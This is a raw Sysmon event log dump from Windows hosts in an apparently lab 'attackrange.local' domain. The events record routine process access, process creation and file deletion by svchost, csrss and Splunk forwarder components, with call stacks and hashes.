07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.957{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.737{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E582164F785ED2DEDE092E3431B47328,SHA256=3A928611B0F0C22BB87EB05967B2F15722714F962FEDD56686D2F5D274A8C403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0160BBF0C0202DEB23F9EFD697035D6C,SHA256=C3C6EA69D5D7301EDBB9D2AD1EA735D13574FAEA27CF00B272CAD37A0B3727CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.300{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.284{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.285{0C1E0330-F56E-60EB-8B79-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:27.828{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F6DD866191EF6E67B76D188C6E3196,SHA256=89DAB9EA34E505631F63CBDFF1B8659CFB082761D7C3860CD8E05CF30F6B90CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.815{0C1E0330-F56F-60EB-8D79-00000000D001}4048360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 